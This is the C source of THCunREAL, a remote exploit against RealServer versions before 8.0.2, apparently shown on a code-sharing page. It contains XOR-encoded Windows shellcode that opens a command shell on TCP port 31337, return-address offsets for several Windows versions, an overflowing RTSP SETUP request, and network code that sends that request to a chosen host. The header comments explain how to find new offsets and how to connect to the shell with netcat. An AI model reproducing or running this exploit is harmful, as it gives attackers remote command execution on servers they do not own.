📄 thcunreal.c
字号:
/*****************************************************************************/
/* THCunREAL 0.1 - Wind0wZ remote root exploit */
/* Exploit by: Johnny Cyberpunk (jcyberpunk@thehackerschoice.com) */
/* THC PUBLIC SOURCE MATERIALS */
/* */
/* This exploit can be freely distributed ! If u r smart enough you can add */
/* further offsets for other OS Versions/Types/Servicespacks blabla.... */
/* */
/* The exploit was tested on 4 different boxes with RealServer 8.0.0.149 */
/* The bug is exploitable on Realservers < 8.0.2 */
/* */
/* While probing lot's of boxes via 'OPTIONS / RTSP/1.0' on TCP port 554 */
/* i noticed that 99% of the probed machines are not up2date yet ! =;O) */
/* */
/* The shellcode used in diz exploit is completely offsetless and XOR 0x20 */
/* encoded, coz Realserver doesn't allow the following bytes in the SETUP */
/* field : 0x00,0x0d,0x0a,0x25,0x20,0xff ! That's also the reason why i use */
/* mov dl,0x1f + add dl,0x01 for xor 0x20 encoding. hehehe... */
/* */
/* The shellcode itself scans for the KERNEL32.DLL by using FS:0 + searching */
/* for 'MZ' entry, followed by analysing the PE-Header for API offsets */
/* needed by this shellcode. After that we can load WS2_32.DLL for socket */
/* APIs and begin the usual shellcode process ! Thanx to several virus */
/* coders and Halvar Flake for that rocking idea ! I was wondering why so */
/* less people aren't using it today in their exploits ! Just because LSD */
/* has made this technique public on HiverCon 2002 ! Actually this one isn't */
/* optimized, but later shellcodes will have a size < 300 bytes. */
/* */
/* After successful exploitation of this bug, a commandshell should spawn on */
/* TCP port 31337 ! Use netcat to connect to this port ! */
/* */
/* To find further offsets use softice on windows or gdb on linux boxes ! */
/* If you're debbugging with softice do the following to find offsets : */
/* Start the Realserver 8 ! ;) */
/* Enter softice and do the following commands : */
/* addr rmserver + bpx 405cfc */
/* Start the exploit and softice will break on the following lines of code : */
/* */
/* mov ecx,[eax] */
/* lea edx,[ebp+FFFFF000] */
/* push 00 */
/* push edx */
/* push 80004005 */
/* push 80004005 */
/* push 03 */
/* call [ecx+0c] */
/* */
/* As we can overwrite EAX, we have to create 3 values */
/* (2 retlocs and 1 retaddr), to get control of a vuln system ! */
/* The good news is, that just the EAX value can differ on different OSs/SPs */
/* The rest can be calculated ! */
/* retloc2 = retloc1-8; */
/* retaddr = retloc1+8; */
/* */
/* Unfortunately i hadn't a Linux/Sparc or whatever Platform Realserver 8 */
/* runs on. I just know it's also exploitable on other OSs ! */
/* So if u wanna exploit other platforms, try to get Realserver 8 and use */
/* gdb to find out, how this can be exploited ! Good luck ! */
/* */
/* compile with MS Visual C++ : cl THCunREAL.c /link ws2_32.lib */
/* */
/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak, */
/* scut, stealth, zip, zilvio and the rest of the combo ...... */
/*****************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
struct TARGETS {
char *winver;
unsigned long retloc1;
};
struct TARGETS targets [] = {
{"Windows 2000 - SP2", 0x0434ecad},
{"Windows 2000 - SP3", 0x0433ecad},
{"Windows XP SP1", 0x03fdecad},
{"Windows NT4 SP6a", 0x0477ecb1},
{NULL,0},
};
char w32portshell[] =
"\x8b\x7d\x08\x33\xc9\x33\x02\xb2\x1f\x80\xc2\x01\x66\x81\xc1"
"\x9d\x02\x83\xc7\x25\x8a\x1f\x32\xda\x88\x1f\x47\xe2\xf7\xcb"
"\x49\xa5\xb6\xdf\xdf\xec\x67\xba\x5c\x3b\xea\x07\x1d\x96\x45"
"\x45\xe3\x4c\x2c\x01\x16\xc2\xb7\x86\x51\x16\x34\x68\x34\xef"
"\x1c\x61\x48\x37\xee\xed\xe9\xb8\xf2\xc0\x01\x99\xda\x7d\x6c"
"\xf8\x25\xda\x27\xbb\x5e\x90\x49\xa0\xdf\xdf\xdf\xdf\x4b\xf8"
"\xc3\x43\x49\x4e\x44\x42\x45\xf1\xf7\x43\x54\xf1\xf7\x53\x45"
"\x4e\x44\x53\x45\x43\x56\x52\xdf\xdf\xdf\xdf\x77\x73\x12\x7f"
"\x13\x12\x0e\x64\x6c\x6c\xdf\x7c\x43\x4d\x44\x0e\x45\x58\x45"
"\xdf\xcb\x22\xcb\x25\xc8\xd9\xdf\xdf\xdf\x7d\xa3\xcd\x54\x11"
"\xe0\xcb\x7b\x75\xa9\xc5\x40\xab\x65\x28\xab\x78\x1c\x21\xe3"
"\xab\x6b\x58\x21\xe1\xab\x59\x3c\x21\xe7\x77\xab\x59\x04\x21"
"\xe7\x77\xdf\x51\x30\x61\xab\x51\x3f\x69\x21\xe6\x11\xe9\xa9"
"\xe7\x11\xfb\x61\x8d\x21\xd8\x76\xa9\xe6\x11\xe0\x8c\x21\xe3"
"\xe1\xeb\x28\xa4\xe0\x55\xd4\x1b\x7d\x2c\x7e\x55\xc5\x78\x7a"
"\x09\xe1\x2f\x97\x2c\x6a\x7e\xab\x24\xae\x21\xd8\xa9\x64\x04"
"\x3c\x41\x7d\xe3\x94\x30\x09\xe4\x11\xe9\x44\xab\x31\xa9\xf7"
"\xab\x2f\xa1\xd9\xdf\xdf\xdf\xdf\x54\x24\xa9\xef\xcb\xd2\xab"
"\x5f\x24\x46\x11\xdf\x11\xe9\x95\x30\x46\xab\x37\x46\xa1\xda"
"\x6d\x7a\x54\x24\x09\xef\xcb\xd2\xa9\x5d\xdc\xad\x7d\x5c\xad"
"\x55\x27\x8d\x70\x60\x54\x2e\xb0\x77\xdf\xf3\xa9\x66\xdc\xa9"
"\xe1\xc9\xcd\xdf\xdf\xdf\x10\xe0\xa6\x65\x41\xa4\xe0\x54\x2d"
"\xad\x75\x77\x72\xdf\xf1\xa9\xe7\xc9\xf7\xdf\xdf\xdf\xad\x9d"
"\x48\xdf\xdf\xdf\x77\xdf\x75\x0f\xad\x55\x42\x21\xe7\x85\x85"
"\x10\xe0\xa8\x27\x11\xfb\x73\x4a\x21\x4a\x22\xdf\x75\x1b\xa9"
"\x65\xc4\xa9\x7d\xd0\xa9\x7d\xd4\xa9\x7d\xcc\x93\x22\xa9\x7d"
"\xc8\x2f\x97\x7d\x22\x2f\x97\x65\x24\x11\xf8\x46\xa9\x65\xca"
"\x4a\x30\xad\x7d\xc8\x73\xdf\x55\xc4\xdf\x75\x1f\x4a\x21\xdf"
"\x55\xc4\xdf\x75\x67\x11\xe0\xa9\x65\xfc\x60\xa9\x65\xc0\x90"
"\x2c\xa9\x65\xf8\x11\xe0\x70\xad\x7d\xf8\x73\xa9\xf9\xa3\xcb"
"\x24\x73\xa3\xcb\x24\x73\x70\x71\xa3\xcb\x24\x73\xa3\xcb\x24"
"\x73\xab\x7d\x2b\xdf\xf3\xdf\xf3\xad\x65\xa4\x70\xdf\x75\x37"
"\xab\x65\xf4\xa9\x65\xe4\xa9\x65\xe0\xab\x65\xe8\xa9\x65\x9c"
"\x11\xe0\x46\xa9\x65\x94\xde\xe0\xde\xe4\xa9\x65\x90\xde\xe8"
"\xa6\x65\x4a\xad\xbd\x48\xdf\xdf\xdf\xad\xb5\x54\xdf\xdf\xdf"
"\xad\x6d\xa4\x11\xe0\x72\x71\x70\x70\x70\x4a\x21\x70\x70\x70"
"\x73\xdf\x75\x27\x11\xe0\x70\x70\xdf\x55\xc4\xdf\x75\x63\xa9"
"\x65\xc4\xad\x9d\x4c\xcf\xdf\xdf\x4a\x5e\xdf\x75\x2f\x11\xfb"
"\x73\xad\xad\x50\xdf\xdf\xdf\x71\x73\x73\x73\xdf\x55\xf0\xdf"
"\x75\x3f\x19\xbd\x50\xdf\xdf\xdf\x54\x17\x73\xad\xb5\x4c\xdf"
"\xdf\xdf\x72\xab\xb5\x50\xdf\xdf\xdf\x94\xde\x10\xe0\x46\xa5"
"\xe2\x54\x24\x96\x22\x10\xf2\x72\x77\xdf\x55\xf0\xdf\x75\x03"
"\xa5\xe0\x54\x18\x73\xdf\x95\x4c\xdf\xdf\xdf\x77\xdf\x55\xc4"
"\xdf\x75\x6b\xcb\x83\x73\x11\xe0\x94\x22\x70\x77\xdf\x55\xc4"
"\xdf\x75\x6f\x60\x54\x38\x68\x54\x35\x73\xad\xb5\x50\xdf\xdf"
"\xdf\x72\x70\x77\xdf\x55\xec\xdf\x75\x07\xc9\x5b\xdf\xdf\xdf"
"\x48\xdf\xdf\xdf\xdf\xdf\x75\x2f";
void usage();
int main(int argc, char *argv[])
{
unsigned short realport=554;
unsigned int sock,addr,i,rc;
unsigned char exploit_buffer[4124];
unsigned long retloc2, retaddr;
struct sockaddr_in mytcp;
struct hostent * hp;
WSADATA wsaData;
printf("\nTHCunREAL v0.1 - Wind0wZ remote root sploit for Realserver < 8.0.2\n");
printf("by Johnny Cyberpunk (jcyberpunk@thehackerschoice.com)\n");
if(argc<3)
usage();
if((atoi(argv[2]))>3)
usage();
retloc2 = targets[atoi(argv[2])].retloc1-8;
retaddr = targets[atoi(argv[2])].retloc1+8;
memset(exploit_buffer,'Z',4123);
memcpy(exploit_buffer,"SETUP /",7);
*(unsigned long *)&exploit_buffer[7] = retloc2;
*(unsigned long *)&exploit_buffer[7 + 4] = retaddr;
memcpy(&exploit_buffer[15],w32portshell,strlen(w32portshell));
*(unsigned long *)&exploit_buffer[4086] = targets[atoi(argv[2])].retloc1;
memcpy(&exploit_buffer[4090]," RTSP/1.0\r\nTransport: THCr0x!\r\n\r\n",33);
if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
{
printf("WSAStartup failed !\n");
exit(-1);
}
hp = gethostbyname(argv[1]);
if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) )
{
printf("Unable to resolve %s\n",argv[1]);
exit(-1);
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock)
{
printf("socket() error...\n");
exit(-1);
}
if (hp != NULL)
memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
else
mytcp.sin_addr.s_addr = addr;
if (hp)
mytcp.sin_family = hp->h_addrtype;
else
mytcp.sin_family = AF_INET;
mytcp.sin_port=htons(realport);
rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
if(rc==0)
{
send(sock,exploit_buffer,4123,0);
printf("\nexploit send .... sleeping a while ....\n");
Sleep(1000);
printf("\nok ... now try to connect to port 31337 via netcat !\n");
}
else
printf("can't connect to realserver port!\n");
shutdown(sock,1);
closesocket(sock);
exit(0);
}
void usage()
{
unsigned int a;
printf("\nUsage: <Host> <target-type>\n");
printf("\nTargets available :\n\n");
for (a=0; targets[a].winver != NULL; a++)
printf ("%d) - %s\n", a, targets[a].winver);
exit(0);
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -